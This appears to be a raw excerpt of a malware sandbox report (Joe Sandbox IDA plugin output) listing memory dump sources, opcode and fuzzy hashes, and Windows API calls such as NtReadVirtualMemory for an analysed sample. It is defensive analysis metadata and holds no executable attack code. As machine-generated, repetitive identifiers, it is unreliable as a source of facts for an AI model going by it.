                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$k$o
                                                                                                                                                                                                                          • API String ID: 0-3624523832
                                                                                                                                                                                                                          • Opcode ID: 1fc2d37dc15af20fe1fc25a08dc12bb132dcc16aac029dbb2feb8f04dd5bdf9d
                                                                                                                                                                                                                          • Instruction ID: 411d053160a14b9238e2a247fd12785eb7deaf6904b53b22ac5a1abe410bc4a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fc2d37dc15af20fe1fc25a08dc12bb132dcc16aac029dbb2feb8f04dd5bdf9d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B109B5A00304AFDB24DBA4CC85FEFB7BDAF88700F14855DF619A7240DA75AA41CB50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$h$o
                                                                                                                                                                                                                          • API String ID: 0-3662636641
                                                                                                                                                                                                                          • Opcode ID: 8b342c7ba02d209fc4552fa57e47124f6fe954f370d59c8c23a092f740ca7b0b
                                                                                                                                                                                                                          • Instruction ID: a21afa750e0665209dbffe95f8851ae8ed89d52e79a36360521f0c357a6973ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b342c7ba02d209fc4552fa57e47124f6fe954f370d59c8c23a092f740ca7b0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7981A2B2C4031A6ADB25DB60CD85FFE737CAF48300F0445AEE509AA241EB745B458FE5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$k$o
                                                                                                                                                                                                                          • API String ID: 0-3624523832
                                                                                                                                                                                                                          • Opcode ID: 45d3c964bc5532eff8f70ee376b0aa900bf66a4074014315008f3cf1dc49b856
                                                                                                                                                                                                                          • Instruction ID: 40348700c1662db559833877e89e159614b53ec9cf5c906e77dd81f8ac6e663c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d3c964bc5532eff8f70ee376b0aa900bf66a4074014315008f3cf1dc49b856
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44612DB5A00308AFDB54DFA4CC84FEFB7BDAF88700F108559E659AB240D775AA41CB60
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                                                                                                                          • API String ID: 0-2877786613
                                                                                                                                                                                                                          • Opcode ID: b1faf90328379cb5a9e287adc3e3dc9b31ff735e1bad9ff9630dbdadbd9cc571
                                                                                                                                                                                                                          • Instruction ID: 2a0c2b07117417b32fdb644aed522d957f20fe7f65ca3177810a110ef60231ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1faf90328379cb5a9e287adc3e3dc9b31ff735e1bad9ff9630dbdadbd9cc571
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1413DB59112187AEB02EB94CD87FEF777DAF55700F40404AFA04AA280E7786A0587E6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: $e$h$o
                                                                                                                                                                                                                          • API String ID: 0-3662636641
                                                                                                                                                                                                                          • Opcode ID: bcdb2f48bf0a621cbeece34435c1b495991272a645da566a6b502592fa563db4
                                                                                                                                                                                                                          • Instruction ID: 532f8a3eb625f3b64e1b536ffde21192b7f07ae5b223411986f285da89ad3491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcdb2f48bf0a621cbeece34435c1b495991272a645da566a6b502592fa563db4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0415375C40319AADB14DBA4CD45FFEB37DAF48300F0085EAA50DAA241EB7467858FE5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000003.00000002.30692256337.00000000036C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_36c0000_vCWtwarpbXUl.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: -$1$5$E
                                                                                                                                                                                                                          • API String ID: 0-3386120863
                                                                                                                                                                                                                          • Opcode ID: 6a64c15229702e7d05f1ac4d9035698d3f3043b7a3612be215f0a93311b6f7a2
                                                                                                                                                                                                                          • Instruction ID: 2bb7b66b4b807ab915f746bae2a75e5e20012340db94244236229578250f6b47
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a64c15229702e7d05f1ac4d9035698d3f3043b7a3612be215f0a93311b6f7a2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 363134B5D102097BEB04DFA4CD45BFF77B8EF58304F00459AE904AA240E7769A158BE5

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:0.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:93.8%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:48
                                                                                                                                                                                                                          Total number of Limit Nodes:3

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL ref: 0331F228
                                                                                                                                                                                                                          • NtReadVirtualMemory.NTDLL ref: 0331F33C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462599408.0000000003310000.00000040.00000800.00020000.00000000.sdmp, Offset: 03310000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3310000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 1498878907-4108050209
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 153 34a2b00-34a2b0c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 154 34a2b10-34a2b1c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 157 34a2bc0-34a2bcc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 155 34a2b80-34a2b8c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 156 34a2b90-34a2b9c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 3130023ee49baf1a93ce7fe8285f18dfad004e2600746d4559331bdbe5525acf
                                                                                                                                                                                                                          • Instruction ID: 8ca7b4525bdb107429b3cca1b40b7e960f241d3a691c7567c47de5fdecc300af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3130023ee49baf1a93ce7fe8285f18dfad004e2600746d4559331bdbe5525acf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E9002312010CC03D510A15885047CA001987D0301F55C816A4414A58DC7A588917135

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 150 34a2a10-34a2a1c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e878322f89486ecf633f5923f13f050843dd9b28e8079eb453ca095fa7036ec7
                                                                                                                                                                                                                          • Instruction ID: 783b354864f696395aa4431b51288ce5ec7d6583d4c3713319a635885f5030b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e878322f89486ecf633f5923f13f050843dd9b28e8079eb453ca095fa7036ec7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D900225221044034545E558070458B045997D6351391C41AF1406990CC73188656335

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 152 34a2ac0-34a2acc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 25a3ddb01eff590967d67c8476175135fde696f2416eb4f59aa22e99919bb8b3
                                                                                                                                                                                                                          • Instruction ID: 58d19b1fa9c8bd053caae6cb3cedd845071812763c0171c641836126c67f9f11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25a3ddb01eff590967d67c8476175135fde696f2416eb4f59aa22e99919bb8b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE90023160504C03D550B15845147C6001987D0301F51C416A0014A54DC7658A5576B5

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 151 34a2a80-34a2a8c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 85320d34bffa7287c43d3c951e91ce78b56f8b511b26e5535f8a2be6acb5b65f
                                                                                                                                                                                                                          • Instruction ID: bf194fa1eba039581a88f7ccd462b96641152de574677fcd16bf0e76a9d150b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85320d34bffa7287c43d3c951e91ce78b56f8b511b26e5535f8a2be6acb5b65f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A900261202044038505B1584514696401E87E0201B51C426E1004990DC73588917139

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 149 34a29f0-34a29fc LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 03eb3f29507dba6cdf753e8672755275e0bc00d7bb3552face1051db01512e95
                                                                                                                                                                                                                          • Instruction ID: 04916a15b661f29be3e1bfb6b05f085a8e9aa26f74d12fdb4eaba02bb0f0e798
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03eb3f29507dba6cdf753e8672755275e0bc00d7bb3552face1051db01512e95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89900435311044034505F55C07045C7005FC7D5351351C437F1005D50CD731CC717135
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e18efe85dda48cc48621328f6cf7aa3a4e70d610dd80b3d1a57eb156fecfdf40
                                                                                                                                                                                                                          • Instruction ID: 769209c15f39526bb1eff615662e1891afe1a6a21142d99c3e121143d81224ce
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e18efe85dda48cc48621328f6cf7aa3a4e70d610dd80b3d1a57eb156fecfdf40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6290022121184443D600A5684D14B87001987D0303F51C51AA0144954CCB2588616535
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: d6fb4bd8878d2f1c78a256a4e802e10d0301261a0cc7ad5e46ef6b7b4b38f68b
                                                                                                                                                                                                                          • Instruction ID: b6f9126c165e5728b12c0775563838d1053887101f2bfa079adbbfa736f443cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6fb4bd8878d2f1c78a256a4e802e10d0301261a0cc7ad5e46ef6b7b4b38f68b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A190026134104843D500A1584514B860019C7E1301F51C41AE1054954DC729CC52713A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 37c479bb7173d10a09cb50d0016864814eea998edf1f9bcae7e158fb9faa694a
                                                                                                                                                                                                                          • Instruction ID: 91dde89cac85a188e7909a31d5a9679fd5de5220b44b48e90cfe594726621fe1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37c479bb7173d10a09cb50d0016864814eea998edf1f9bcae7e158fb9faa694a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1090026120144803D540A5584904687001987D0302F51C416A2054955ECB398C517139
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ea84d74c552e178ee68ff6e782dff2cf2e7d952a1b4935a1c742b032ee8443aa
                                                                                                                                                                                                                          • Instruction ID: ce3195231453aef85b39f019d8cdd7a40dd45e77f238d2945a942cce712a98fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea84d74c552e178ee68ff6e782dff2cf2e7d952a1b4935a1c742b032ee8443aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55900221601044438540B16889449864019ABE1211751C526A0988950DC76988656679
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: 1a60240afe47bfe3ac5e8fa47b063431effb005ffb87c582ea1d422686ce695e
                                                                                                                                                                                                                          • Instruction ID: e20382be24158017023915907f0e0225bc5b18c9f16c3d119b37560dd97eb746
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a60240afe47bfe3ac5e8fa47b063431effb005ffb87c582ea1d422686ce695e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3790023120104813D511A1584604787001D87D0241F91C817A0414958DD7668952B135
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.0000000003559000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_3430000_ROUTE.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ddc669f29769f9cea54a0de1b70fe0522ef54c39581cc20768b2e560dfc9e1b3
                                                                                                                                                                                                                          • Instruction ID: 4f32208dba795a740437d4e3a1d8763bbb19dc0335aa53297efca600e4a35ae0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddc669f29769f9cea54a0de1b70fe0522ef54c39581cc20768b2e560dfc9e1b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B390022160104903D501B1584504696001E87D0241F91C427A1014955ECB358992B135

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 159 34a2c50-34a2c5c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, Offset: 03430000, based on PE: true
